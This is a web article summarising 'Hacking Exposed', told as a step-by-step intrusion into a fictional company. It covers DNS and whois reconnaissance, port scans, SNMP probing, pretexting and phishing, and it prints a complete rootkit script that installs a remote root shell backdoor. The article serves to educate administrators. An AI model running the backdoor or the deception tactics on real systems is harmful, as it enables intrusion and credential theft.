Hacking Exposed

" Where do you want to go today ? "


"Hacking Exposed" is a book that claims to illustrate how hacking is done. By hacking they mean : gaining unallowed access to a system, and consequently try and take some level of control over the system, or retrieve information from it. The correct term for this type of activity is not hacking : it's cracking, or intrusion, or network penetration, or computer crime, or what not, but it is not hacking. But for marketing, "hacking" sounds better.

Some of my opinions about cracking can be found here .

The book further shows how easy it is (or can be) to break in to a networked system. The authors claim this is a warning to unknowing system administrators, and then goes on to explain, in great detail, just how to do it and where to get the tools. So, although the book can serve to educate system administrators about threats to their systems, and how to prevent or cure them, it is at the same time a cookbook for script kiddies.

Still, the first few chapters are interesting, because they explain how such a 'hack' is prepared - it offers insight in aspects of data communication, networking and the internet, and shows what a network looks like from the outside. This gives a network administrator an idea of just how 'exposed' his networks and their hosts really are, and that's why I summarize them here, with some examples.


Target

First of all, you need to decide who your target will be. script kiddies of course skip this step : they go for the weakest victim they can find in a short time, by blindly scanning the internet for open ports and applying exploits created by others.

We will, for this exercise, target an imaginary company, The Silly Software Company. In real life, the target can be any system, for any reason.

Locate the target

When you've decided who your target will be, you'll have to be able to locate them on the network - the internet, most often. That means you need to find some of their IP addresses, or at least the IP address of 1 server or other host that belongs to your target company. If they have a web server or a mail server, those addresses can easily be found, because they're needed for mail transfer or for people to visit their web site. On the other hand, they may have their web site hosted by an external company, or have their mail handled by their ISP's mail server, so you will find those IP addresses in stead of the company's. Still, there are a number of ways to find an IP address.

Of course, script kiddies - again - skip this step because they blindly strike out at the easiest or nearest victim : they scan for any system that uses the software for which they've downloaded an 'exploit'.

If you can't find an IP address easily, the next step may provide some.

Network Reconnaissance or "footprinting'

Who is ...

The WHOIS databases are maintained by the domain name registrars. Those are the companies that sell domain names such as google.com and bbc.co.uk. The information in these databases can be accessed by tools on your computer (unix/linux : whois), on the WWWeb (example), or via features in certain network administration tools, e.g. Sam Spade. The result may look like this :

   
	microsoft.com 
 	
	Registrant:
	Microsoft Corporation (MICROSOFT-DOM)
	1 microsoft way
	One Microsoft Way
	redmond, WA 98052
	US
	
	Domain Name: MICROSOFT.COM
	
	Administrative Contact:
	MICROSOFT CORPORATION msnhst@MICROSOFT.COM
	One Microsoft Way
	Redmond, WA 98052
	US
	425 882 8080 fax: 206 703 2641
	
	Technical Contact:
	MICROSOFT CORPORATION msnhst@MICROSOFT.COM
	One Microsoft Way
	Redmond, WA 98052
	US
	425-882-8080
	
	Record expires on 03-May-2013.
	Record created on 02-May-1991.
	Database last updated on 21-Mar-2004 07:27:32 EST.
	
	Domain servers in listed order:
	
	DNS1.CP.MSFT.NET 207.46.138.20
	DNS1.TK.MSFT.NET 207.46.245.230
	DNS3.UK.MSFT.NET 213.199.144.151
	DNS1.DC.MSFT.NET 64.4.25.30
	DNS1.SJ.MSFT.NET 65.54.248.222


	

The information can be helpful to get the 'real life' picture of your target (company name, address, phone number), possibly some additional eamil addresses, and so on. This can be used for educated guesses at user names, passwords, email addresses, or for social engineering (see further).

While people are usually good with words, computers are better with numbers. So a system has been developed to translate words (server names, URL's, ...) into numbers (IP addresses), or vice versa. This is called the Domain Name System, and it consists of a number of servers (DNS servers, name servers) that hold databases with computer names and addresses. Computers interrogate ("query") these DNS servers to find the address if they know the name, or find a name when they know the address.

The whois info for a domain includes the name servers for this domain, so they're the next thing you'll look in to ...

DNS

The DNS system can be queried by any computer, because otherwise your web browser would not be able to find the IP address of 'www.playboy.com' when you're surfing the web, or your email program would not be able to figure out where to send your email.

Consequently, you can interrogate the DNS system to find out about a company's servers and their addresses. The tool you can use is nslookup, which can be found on any computer with TCP/IP (except those of the Windows 9x family).

Say or target has a web site, www.sillysoftware.com. With

		nslookup www.sillysoftware.com
	

We find that this site's IP address is 204.145.220.17. When we nslookup that address, we find it belongs to My Dotcom. Apparently, the Silly Software website is hosted by My DotCom, and we're not interested in them. So, lets see if we can find an other server that belongs to the Silly Software Company, maybe a mail server.

	
		pc01# nslookup
		# sillysoftware.com
		  
			Non Authoritive answer
			name : silly.com
			addresses : 204.145.220.17
  
		# set type=ANY
		# silly.com
		
			mail addr = ned.silly.com
			
			Authoritive answer can be found from
			silly.com	nameserver = auth.ns.uu.net
			silly.com	nameserver : auth02.ns.uu.net
		
			auth.ns.uu.net		internet address = 222.145.220.213
			auth02.ns.uu.net	internet address = 81.86.235.2
			mail.silly.com		internet address = 207.204.120.8
	
	

And there it is : we find the silly software company's mail server at IP address 207.204.120.8

More from DNS ?

So far, we've used our own (default) DNS server and had it query the Silly Software DNS server. That tels us the name and address of the DNS server that is Authoritive for the Silly Software company's silly.com domain. Next , we could also have nslookup interrogate the Silly Software nameserver, by setting ' server auth.ns.uu.net ' .

Sometimes, DNS servers allow you to download parts of their database. Normally, they should only allow this to their backup / secondary dns servers ("zone transfer"), but unless the system administrator configured the server to prohibit this, you are able to get the complete DNS database of a server, with the ls -d command in interactive nslookup. You can redirect this information to a file with >> redirection operator. That would give you a complete list of all host names and addresses for a domain - or at least the ones the DNS server knows.


	ls -d silly.org 
	[auth02.ns.uu.net]
	$ORIGIN silly.com.
	@			6H IN SOA	auth02.ns.uu.net. hostmaster.uu.net. (
					990570		; serial
					6H		; refresh
					1H		; retry
					2w6d		; expiry
					6H )		; minimum

				6H IN NS		auth02.ns.uu.net.
				6H IN NS		auth51.ns.uu.net.
				6H IN A		216.222.35.189
	sergey			6H IN A		207.204.120.25
	scc_gate		6H IN CNAME		scc-gate
	scc-router		6H IN A		207.204.197.15
	switch1			6H IN A		207.204.120.4
	central			6H IN A		207.204.120.5
	main_nt			6H IN A		207.204.120.9
	mail			6H IN A		207.204.120.8
	scc_router		6H IN CNAME		scc-router
	fw			6H IN A		207.204.120.1
	scc-gate		6H IN A		207.204.120.6
	www			6H IN A		204.145.220.17
	uunet-gw		6H IN A		207.204.197.1
	
	

If a zone transfer fails (it should, really - zone transfers to foreign systems should be disabled by the dns administrator. But sometimes they forget), you can still do a DNS query of type 'ANY', or look for specific records (NS, MX), or just run the unix 'host' command against a list of addresses, host names, or the domain name.

	ix:~$ host microsoft.com
	microsoft.com has address 207.46.197.32
	microsoft.com has address 207.46.232.182
	microsoft.com mail is handled by 10 maila.microsoft.com.
	microsoft.com mail is handled by 10 mailb.microsoft.com.
	microsoft.com mail is handled by 10 mailc.microsoft.com.

	

Back and Forth

Information from whois / RIPE gives you, amongst others, names and IP addresses of name servers, and network ranges registered by the target company. DNS then reveals more names and addresses. IP addresses can again be queried in whois, to reveal the registrant of the network range they belong to. With some back and forth between whois and DNS, you end up with a nice list of (public) networks, hosts, and their IP addresses. If the DNS administrator was careless enough to include internal names and/or private addresses in his public DNS zone, you also get a first look at what the internal LAN may look like.

When you run whois with an ip address, you find the network it belongs to, and other networks owned by the same registrant. here is a Microsoft example again

	ix:~$ whois 65.54.240.126

	OrgName:    Microsoft Corp
	OrgID:      MSFT
	Address:    One Microsoft Way
	City:       Redmond
	StateProv:  WA
	PostalCode: 98052
	Country:    US
	
	NetRange:   65.52.0.0 - 65.55.255.255
	CIDR:       65.52.0.0/14
	
	

So, going back and forth between RIPE (whois) and DNS, it's trivial to find (at least the public parts) of a network.

traceroute

During the 'footprinting' process, you've located a number of machines or networks. At this point, you may want to stage a Denial of Service Attack against one of those machines, if that kind of thing is your goal.

You may also want to have a closer look at the company's network. Let's see which route an IP packet will follow to go from our system to those machines : we trace a route (with traceroute on Linux or tracert on Windows). This shows all routers between our system and the Silly Software Company's name server. Including the router that connects them to the internet, maybe even their firewall. We can do the same for their mail server, or any other server we know of.

traceroute / tracert


	Tracing route to mail.silly.com [207.204.120.8] 30 hops max:

	[...]
	 17   104 ms   103 ms   110 ms  0.so-3-0-0.XL1.NYC1.ALTER.NET [152.63.27.29] 
	 18   104 ms   103 ms   103 ms  0.so-0-0-0.XR1.NYC1.ALTER.NET [152.63.19.85] 
	 19   104 ms   123 ms   104 ms  207.ATM7-0.GW11.NYC1.ALTER.NET [152.63.22.145] 
	 20   107 ms   112 ms   107 ms  scc-ext-gw.customer.alter.net [156.131.7.202] 
	 21     *        *        *     Timeout 
	 22   
	[...]
	Trace completed.

	Tracing route to central.silly.com [207.204.120.5] 30 hops max:
	[...]
	 18   102 ms   103 ms   102 ms  0.so-0-0-0.XR2.NYC1.ALTER.NET [152.63.19.97] 
	 19   110 ms   106 ms   103 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149] 
	 20   106 ms   107 ms   106 ms  scc-ext-gw.customer.alter.net [156.131.7.202] 
	 21     *        *        *     Timeout.

	[...]
	Trace completed.

	

Comparing both routes + the ip addresses of the servers leads to a preliminary conclusion that 156.131.7.202 may be their external gateway (the router that connects them to the internet).

This router is on the route to the hosts we're tracing, but we don't get any replies from beyond it. This may indicate they have a router there that doesn't respond to the traceroute packets (a firewall ?). More about how to traceroute hosts behind firewalls, or how to interpret the time-outs, can be found in the man traceroute pages. By matching the traceroute starting port to the number of hops, it might be possible to traceroute beyond the firewall. There exist also a version of traceroute, and some other tools such as firewalker, to traceroute through a firewall.

War Dialing

In this day and age, who the fsck uses modems still ?
You'd be surprised. Modems are still quite frequently used : in older, yet-to-be-upgraded networks, for specific applications where network connectivity is not (yet) feasible, as a cheap solution for vendor remote assistance (eg to a PBX ..), ...

So if you're gonna be war dialing, you still may find a number of modems, connected to PBX's, personal computers, dial-up servers, ... The interesting part about them is that these modem connections by-pass any network firewall.

The best war dialing tools were developed for DOS PC's; ToneLoc is a fine example.

Wireless

With wireless networks all over the place, war dialing has been reinvented in the form of war driving : looking around for wireless networks, then try to connect to them. Here is a proof of concept. Other forms of wireless data communication (blue-tooth, infrared, ...), especially with support for 'ad-hoc networking', also deserve attention.

Enumeration

So far, so good

So far, we've collected a number of hostnames and their IP addresses, and we have a rough idea of the IP range The Silly Software Company is using, so we can make an educated guess at other IP addresses they may be using. We have at least 1 email address so we can guess what other email addresses may look like. We know a thing or to about the local network at the Silly Software Company : at least the address of their external (border) router, maybe a bit more (there's probably a firewall).

The next step it to collect as much additional information as possible. This is called 'enumerating the network'. There are a lot of tools to be found on the web, but often they are just nice friendly user interfaces for the techniques described below.

Websites ... may the source be with you

Web sites can be interesting ... First of all, you might find some people's names, email addresses, and other information that can be useful for "social engineering'. The source code of the website might even be more interesting, and it's readily available in your browser (although it me be handier to just download the entire site, and use some text search and filtering tools to find what you're after). Things of interest : scripts. Lazy or incompetent web developers resort to cheap tricks in client-side scripts, eg. values in "hidden' fields or clear text user names and passwords in e.g. a database connect string. Looking at a website's source can reveal interesting information.

tools : wget, grep, ...

Explore

You could first explore a bit more, e.g. by tracing routes to other addresses in the same class. Hosts that don't reply to a ping might still become visible or reveal their hostname. It may also give you a clearer picture of the IP ranges in use.

In this case, we might have assumed that the The Silly Software Company uses an IP range of 16 addresses (i.e. 14 hosts) or a range of 32 addresses (30 hosts). The DNS lookup, however, revealed that there are more addresses in use : a set of addresses like 207.204.120.1 to 207.204.120.231. This suggests a complete class C network (nnn.nnn.nnn.1 to 254, subnet mask 255.255.255.0) because the next smaller subnet can only hold hosts (subnet mask 255.255.255.128). A couple of whois queries should be enough to shed some light in this.

Note that the DNS lookup also shows a couple of addresses outside this range. When we trace a route to that additional router, scc-router or 207.204.197.15, we notice that it is behind the external gateway - while the previous traces would stop at the external gateway :

	 19   104 ms   108 ms   105 ms  208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149]
 	 20   106 ms   108 ms   107 ms  scc-ext-gw.customer.alter.net [157.130.7.202]
 	 21   112 ms   108 ms   107 ms  scc-router.silly.com [207.204.197.15]
 	Trace completed
	

This suggest the Silly Software Company has a second network, separate from the 207.204.120.0 network. As the router has address 16 - and routers usually get the first or last address in a range - we assume for now that this is a 15 host subnet with addresses from 207.204.197.1 to 207.204.197.15, subnet mask 255.255.240.

We've also found the following interesting looking names :

name comment address comment 2
scc-ext-gw.customer.alter.net external gateway ? 157.130.7.202 on the ISP's network ?
fw firewall ? 207.204.120.1
scc-router another router ? 207.204.197.15 apparently in a different address range ...
scc-gate another gateway / router ? 207.204.120.6 routers usually have addresses at the start or the end of a range, so this would be unusual
switch1 another gateway / router ? 207.204.120.4
uunet-gw 207.204.197.1
fwext 207.204.197.10
--- --- 207.204.120.254 routers usually have addresses at the start or the end of a range, so we could check this one as well

Port Scan

We can now use a port scanner to see what ports are open (or blocked, or filtered) on the hosts we already know. This will give us information about what these machines are supposed to be doing, and it may reveal some possible points of attack. nmap (Network Mapper)is a popular port scanner. It's output may look something like this :

	
	Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2004-03-21 12:03 
	Interesting ports on www.my.com (82.283.162.210):
	(The 1648 ports scanned but not shown below are in state: filtered)
	PORT    STATE SERVICE
	21/tcp  open  ftp
	22/tcp  open  ssh
	26/tcp  open  unknown
	53/tcp  open  domain
	80/tcp  open  http
	110/tcp open  pop-3
	143/tcp open  imap
	443/tcp open  https
	995/tcp open  pop3s

	Nmap run completed -- 1 IP address (1 host up) scanned in 135.290 seconds

	

nmap can also scan IP ranges, so it can be used to find other hosts on the network as well. Use your knowledge of IP addressing and subnetting to define a suitable range, or (if you have the time or lack the knowledge) scan everything.

On top of that, and among other features, nmap can make a first guess of the operating system used on the hosts you're scanning, so there's another interesting piece if information out there.

Here's a summary of a number of scans. Nmap has several options, all of which can reveal something particular about the targeted network.

	# nmap 3.48 scan initiated Sat Mar 27 12:43:12 2004 as: 
	nmap -sS -O -P0 -R -p1352 -oN log 207.204.120.1-15 
	
	Interesting ports on scc-int-gw-e0.silly.com (207.204.120.1):
	PORT     STATE    SERVICE
	1352/tcp filtered lotusnotes
	
	Device type: general purpose
	Running: Microsoft Windows NT/2K/XP
	OS details: Microsoft Windows NT 4.0 SP 6a + hotfixes
	[repeated at every host]
	
	Interesting ports on firewall2.silly.com (207.204.120.2):
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	747/tcp filtered fujitsu-dev
	1352/tcp closed lotusnotes
	
	
	Interesting ports on 207.204.120.3:
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	747/tcp filtered fujitsu-dev
	1352/tcp closed lotusnotes
	1723/tcp filtered pptp
	
	
	Interesting ports on switch1.silly.com (207.204.120.4):
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	183/tcp filtered ocbinder
	1352/tcp filtered lotusnotes
	
	
	Interesting ports on central.silly.com (207.204.120.5):
	(The 65535 ports scanned but not shown below are in state: filtered)
	PORT     STATE  SERVICE
	1352/tcp open   lotusnotes
	5631/tcp open   pcanywheredata
	5632/tcp closed pcanywherestat
	5900/tcp open   vnc
	
	Device type: general purpose
	Running: Sun Solaris 2.X|7, Microsoft Windows NT/2K/XP
	OS details: Sun Solaris 2.6 - 7 (SPARC), Microsoft Windows NT 4.0 SP 6a + hotfixes
	
	
	Interesting ports on scc_gate.silly.com (207.204.120.6):
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT    STATE    SERVICE
	180/tcp filtered ris
	747/tcp filtered fujitsu-dev
	1352/tcp filtered lotusnotes
	
	
	Interesting ports on 207.204.120.7:
	PORT     STATE    SERVICE
	1352/tcp filtered lotusnotes
	
	Interesting ports on mail.silly.com (207.204.120.8):
	PORT     STATE SERVICE
	1352/tcp open  lotusnotes

	Interesting ports on main_nt.silly.com (207.204.120.9):
	PORT 	   STATE    SERVICE
	1352/tcp filtered lotusnotes
	
	
	[etc ..]


	All 65535 scanned ports on 207.204.120.24 are: closed
	
	All 65535 scanned ports on sergey.silly.com (207.204.120.25) are: closed
	
	All 65535 scanned ports on 207.204.120.26 are: closed
	All 65535 scanned ports on 207.204.120.27 are: closed
	
	Interesting ports on 207.204.120.28:
	(The 65535 ports scanned but not shown below are in state: closed)
	PORT     STATE    SERVICE
	1650/tcp filtered nkd
	
	All 65535 scanned ports on 207.204.120.29 are: closed
	All 65535 scanned ports on 207.204.120.30 are: closed


	# Nmap run completed at Sat Mar 27 14:42:47 2004 -- 
	30 IP addresses (30 hosts up) scanned in 3409.766 seconds


	

The result is not bad: we get a list of hosts in the Silly Software network, their IP address, and a number of interesting ports, some even with Remote Administration Services already listening. We can assume the have a firewall, because nmap evaluates a number of ports as 'filtered'. And of course, the hostname firewall2.silly.com is a dead giveaway :-) .

One more interesting point that show up in the nmap output : machine with IP address 207.204.120.25 is called sergey.silly.com. Sergey is a man's name. Could they be using public IP addresses for (at least some of ) their employees workstations ? And are workstations named after their user ?

Maybe we can send an email to sergey@silly.com, see what gives.

Also, they have that second 207.204.197.0 / 28 subnet that could be worth a closer look. And the DNS resolution of some of the scanned addresses turn out interesting sounding names such as 'fw' (firewall ?), 'fwext' (external firewall ?), 'switch' (a switch with remote management ? an other router ?) and 'main_nt' (a Windows NT domain controller ?) ...
And so on ...

Banner Grabbing

Now that you know the open ports, you can try to find out what software is being used for those services. A quick and easy way to do that is to telnet to the host on that port. Sometimes, the software replies with some sort of welcome message, or at least a command prompt, that may tell what software is behind it. Some ports scanners will do this for you (recent versions of nmap do), or you may look on the internet for banner grabbing tools. Nessus is a know name here. Nessus can also "test" the services in question to see if they are vulnerable to common exploits. Saves you the trouble of identifying vulnerabilities and finding suitable exploits yourself.

Here are some examples of what 'banners' may look like, and what they tell you.
You may find yourself welcome to a Linux system

	
		Welcome to SuSE Linux 7.1 kernel 2.2.14
		Have a lot of fun
	
	

or an old Lotus Notes Domino Server

	
		SMTP gateway for Lotus Domino r 4.6
		_

	

or a pop 3 server ...

	
		+OK POP3 [cppop 9.9] at [209.51.159.225]

	

This information can later be used to look up to what kind of attack, exploit, ... this particular version of that specific software packet is vulnerable. Of course, things like VPN and PCAnywhere services are tempting found during a portscan : all you need for those is a VPN or PCAnywhere client, and you can check whether the system administrator forgot to remove the default accounts and change the factory settings. If so, these services are an open door into the network.

The filtered ports tell you which services are running on the host, but they're firewalled - it may be complicated to connect to them. The response may refer to the host itself, or from a NAT router / firewall between you and the scanned target. Ports that are closed tell you that the machine is not used for the services these ports represent, or that a firewall is blocking any attempt to connect to these ports without telling the system that initiates the connection.

snmp

snmp, the simple network management protocol, is a protocol to monitor devices remotely, over the network. System administrators use it to monitor routers, switches, computers, printers, ... If the snmp service is accessible from the outside, it can be used to collect a complete description of the system in question. So it's worth checking. snmp services are usually configured with a default "public" community that allows read access. The community name serves as a password, and sys admins forget to change it, so ...
snmp version 3 supports more secure authentication mechanisms. Maybe it's time to upgrade - or at least check your community names.

snmp uses UDP so it doesn't usually show up in a default (tcp) port scan. You can explicitly scan UDP ports, or just try to access snmp on the target(s) and see if it responds.

	for target in $list_of_targets; do 
		snmpget -v1 -c public $target system.sysUpTime.0  
	done
	

For those hosts where you can access snmp, you can use snmpwalk or bulksnmpwalk to walk the entire snmp tree.

	for item in $list_of_snmp_targets; do 
		snmpwalk $item ; 
	done
	

snmp data is organized in modules ("MIB"), and depending on the system you're interrogating, it is useful to specify a module to get specific information. For instance, you can specify the LanMgr-Mib-II-MIB - Windows LanManager MIB to retrieve shared directories, sessions, user account names, ... from a Windows system. On routers, you may be interested in the snmp ip subtree, to find out about routing tables and address translation.

Some samples of snmp output :

MIB depot

Service specific information

With the information gathered so far, you may have discovered new ways to find out more about the network you're aiming at. For instance, if you found that some hosts are using netbios, this can be used to retrieve additional information about user names, computer names, possibly also network shares and so on. This page shows netbios vulnerabilities in this respect.

To get some insight in the LAN layout, you might send an email to info@silly.com, get a reply, and read the headers to see how that reply got from the sender (with his IP address and/or host name) to the mail servers. Or use one of the email addresses you've found so far.


		Received: from PC_212	(adsl2256.ppp.my.com [207.201.179.14])
	

Asking for a receipt, and look at the headers when you get it, can also tell you a few things about how mail reaches its destination at The Silly Software Company and thus (partially) illustrate the layout of the network.

Social Engineering

So far, we've only collected information that is readily available, because the internet as it is would nor be able to function without it, and information that can be readily retrieved if sloppy sysadmins forget to take precautions against it. Next, all we did is put 2 and 2 together. To find out more, we'd have to either target specific holes in the security, or use so-called "Social engineering"

Social Engineering is kind of an euphemism. To fill the gaps in the information you've collected so far, you may resort to dirty tricks such as call the receptionist at Silly Software Company, tell her you're the helpdesk and could she please tell you her password because you need to check something. She might just give it. She may also tell you the login name and password of her boss who is such a moron and she always needs to help him whenever he's at a loss with some computer thing.

You may also start hanging out at the place where the Silly Software Techies hang out for lunch, for happy hour, or on Friday after work, and hear them tell stories about how stupid their colleagues are, or so. Stories that may contain interesting details about the IT systems in the company. Interesting details that help you understand what your target looks like, and where the weak points may be.

An other approach could be to visit news groups and forums, and look for entries related to the company your targeting, or names of its employees. One of the network administrators might have asked for help regarding a problem that could be of particular interest.

So, social engineering has nothing to do with engineering, nothing to do with network protocols or data communication - it's just exploiting human weakness, but it's called social engineering to make it fit the picture of the intelligent, technology oriented wizz that can get in to any system.

Nonetheless, it goes to show that the human factor can be one of the weak points in a well protected system, so it's good to be aware of it.

Point of Attack

At this point, we have an idea what the local network at the Silly Software Company may look like, we know where on the internet we can find them, we have some indications of the software they're running, we have some background information about the company, and maybe it's employees and so on. Time to decide how to proceed. A lot depends on what you're after.

We could target one of the servers, e.g. the mail server or the system with hostname 'gate', either as the final goal or as a way to penetrate deeper in the network (they may accept actions from their own servers that they don't accept from external systems, so some level of control over that server may get us further ...).

Mail servers are a popular target, because they hold user accounts : logins, passwords. They must be publicly accessible for mail to be delivered, and they are also trusted by the other hosts on the network, so they can be used as point of entry. They also hold the mail messages, if that's what you're after. Or mail messages may contain information that can help you penetrate deeper in the network.

We have some information about ports that we can connect to (and the services that will reply, maybe the operating systems, etc). That may open opportunities, if there are known security issues with that software. In a case like this, it may be worth a try to get a pcAnywhere client or VNC client and try to connect to the hosts listening for PCAnywhere or VNC. If the network administrator did a sloppy job, some factory settings (default users, passwords, ...) may still be active, and you walk right in.

Method of Attack

The method of attack will be adapted to the point of attack, discussed previously, because it is, at least partially, dictated by the software you find on the target system. There are several ways. Maybe you can locate and retrieve the password file, so when you have that, you can try to connect to the system as a legitimate user, and take it from there. Or maybe one of the services is susceptible to a buffer overflow exploit, which might allow you to open a shell (a command prompt) from where you can access the system, maybe create a superuser account for yourself, or so. There's also root kits, collections of scripts that will help you get access with 'root' (system administrator) privileges on the system you're targeting. Or maybe you have sufficient access to drop a 'Trojan Horse' on the system, that will let you right in next time.

You're first attack may be also aimed at just collecting additional information for future attacks : grab a password list, find a way to get a packet sniffer on the network to read the data that are being transmitted, etc.

An other typical method is to gain access to the network with limited privileges, as guest, or with anonymous FTP or something similar, then apply some tricks or exploit some sysadmin sloppiness to upgrade your account, upload a root kit, steal the password file, ... in order to get control ("own the system"). Here's a descriptin of how an ftp server with some configuration mistakes resulted in complete 'root' access to a server : How we defaced apache.org.

Leave the back door open

After you've gone through all this trouble, you don't want to shut yourself out, so you'll leave a way to sneak in more easily next time. Create a user account (and remember the password), leave a back door program that you can connect to without hassle, etc.

Tools for this kind of activity can be readily found on the web. Of course, you will have to trust the guy who created them : his virus crehttp://www.dataloss.net/papers/how.defaced.apache.org.txtation tool or trojan construction tool may well include a few lines of code that create a backdoor on your own system as well. :-)

Here are a couple of examples I found without too much trouble. I haven't tried them so I don't know if they will work. I iInclude them because they're easy to understand examples of how features of the operating system on the target can be exploited if the sys admin is a bit naive. For systems with less naive sysadmins, I'm sure there are more sophisticated tricks out there.

Windows NT

Windows NT (and other Microsoft Windows systems) still know the autoexec.bat. This is a script that is automatically executed every time the system (re-)boots. They also have the AT command, that can be used to have commands/scripts/programs executed at a given date/time or with a given schedule. This is often considered God's gift to crackers, as it can be used to have commands, scripts, programs, .... executed on the targeted system. One can imagine that an intruder tries to add a few lines to the autoexec.bat, then waits for the system to be rebooted (or get it to reboot by causing it to crash).

An other fine tool is getadmin.exe, a program that uses a flaw in Windows NT to add the user account of your choice to the Administrators group, thus giving that account full Administrator privileges. getadmin.exe is a bit outdated (the flaw in Windows is patched) - but you get the idea. And there are probably other tools out there.

Once you are Administrator, there is no limit to what you can do. With VBS, you can execute any administrator task on the remote machine, including creating new accounts (in case the one you're using is found and removed), or changing passwords on existing accounts.

Linux / Unix

The following trick is supposed to work on Unix / Linux systems : upload a script that contains the source code (in C) of a backdoor program, and some shell commands to compile and run it on the targeted system, using that systems own c compiler (gcc, usually present by default on any Linux / Unix-like system).


	#!/bin/sh	# Fearless Rootkit R-Type v0.1
	# Coded by Merlion
	# 
	# If you do, you do so at your OWN risk
	
	cat > /tmp/rootd.c << EOF  
	
	#include <stdio.h>
	#include <string.h>
	#include <netdb.h>
	#include <netinet/in.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <unistd.h>
	
	void die(char *error);
	main(int argc, char **argv) {
	pid_t pid, sid;
	int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, 	socklen;
	unsigned short int mcon;
	unsigned short int port;
	char *rbuf, *rmode;
	struct sockaddr_in  Client, Server;
	if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
	if (argc != 3) die("Usage");
	memset(&Server, 0, sizeof(Server));
	Server.sin_family=AF_INET;
	port=905;
	mcon=5;
	Server.sin_port=htons(port);
	Server.sin_addr.s_addr=htonl(INADDR_ANY);
	if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
	die("No socket options set");
	if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
	die("Could not bind socket");
	if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");  
	pid=fork();
	if (pid < 0) die("Initial fork() failed");
	if (pid>0) exit(0);
	if ((chdir("/")) < 0) die("Could not set working directory");
	if ((setsid()) < 0) die("setsid() failed in creating daemon");
	umask(0);
	close(STDIN_FILENO);
	close(STDOUT_FILENO);
	close(STDERR_FILENO);
	

	while(1) {
		socklen=sizeof(Client);
		if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1);   		/* 	syslog msg here still */
		clipid=getpid();
		serpid=fork();
		if (serpid > 0)
		waitpid(0, &stat, 0);    
		dup2(sockcli, 1);
		execl("/bin/sh","sh",(char *)0);  }
		close(sockcli);   }
		void die(char *error) {
		fprintf(stderr, "%s\n", error);
		exit(1);  }

	
	EOF
	
	gcc -o /bin/rootd /tmp/rootd.c
	rm -f /tmp/rootd.c
	/bin/rootd
	
	echo "Rootd successfully installed"
	exit 0

	

more ...

More elaborate stuff can be found on the Web, like here:

Next ...

So, you have access to the Silly Software Company's resources. Now what ? The decent thing to do would be to warn them about the security holes in their system, e.g. by sending the system administrator an email explaining what you've done, and how. If you send the mail from within their system, like from the sys admin's own email account, it's more impressive, and it proofs you're not joking.

The black hat approach would now be to use their system for your own benefit, like steal information, or install an FTP server to distribute 'warez', or use their computers as zombies for a Denial of Service attack against your next victim, or use their mail system to start spreading viruses, or run your next intrusion from one of their computers so that it won't be traced back to you, or whatever.

Typically, the intruder will also try yo cover his tracks by modifying log files, create hidden files or folders to cover any stuff that has been uploaded, or place his tools in folders with normal sounding names or use file names that may look as if they belong to the system. A system administrator would need to know his system quite well to notice these changes.

Shortcuts

There are a couple of ways to shortcut the above procedure. For starters, it helps if you're already on the inside. 80 % of all 'intrusions' are done from within, i.e. by employees. That saves the trouble of having to penetrate the network from the outside. Also, employees have accounts already, so their goal would be to find a way to get superuser privileges (privilege escalation) , or find holes, inconsistencies, mistakes in the access privileges that would allow them access to information they were not intended to see or modify. At the least, they have only to look at their own account to see what format usernames and passwords have, which might help.

Penetrating a network is also easier if someone lets you in. You may send emails to The Silly Software Company's employees and make it look as if they come from the system administrator (you know his email address from the DNS lookup !). If you can convince them to execute a certain program ("here's a patch that will repair the problem you've had with your computer. just open the attachment" - that should work : everyone has had problems with computers before ...), you can try and have them install a backdoor that you can use to get in.

Conclusion

The availability of DNS and RIPE information is part of the design of the internet. DNS, RIPE ('whois'), and other online databases are necessary for the internet to function. There is also nothing wrong with servers having publicly accessible ports / services - you can't run a web server without allowing people to connect to its port 80. On the other hand, all this information combined can tell an attacker more than you expect. Lists of networks, IP addresses and routes may allow an attacker to draw a map of your networks and make educated guesses about additional private networks, routes, and possibly vpn tunnels. Private IP addresses can be used for address spoofing so packets appear to be coming from a trusted network. User names and email addresses can be used in social engineering or to make educated guesses about account names. A list of installed software or running services, and their patch level (eg from snmp) greatly simplifies the search for vulnerabilities or exploits. If someone has a list of user accounts, all he needs to do is find a matching password - way easier and faster than having to guess (brute-force, word list, ...) user name - password combinations.

So, while you can not avoid having some info publicly accessible, a security aware system administrator should really consider what information is to be made public, and to whom - and take steps to implement that in stead of accepting whatever defaults came with the package. A few simple steps will greatly reduce your exposure :


Disclaimer

Names and addresses have been changed.
Any similarity with existing persons, companies or events is unintended and purely coincidental.
The purpose of this article is to illustrate how cracking and intrusion can be done, so that people can check if any of the above methods could be applied against their systems. This article should not, in any way, be seen as a manual for or encouragement of criminal activity of any kind.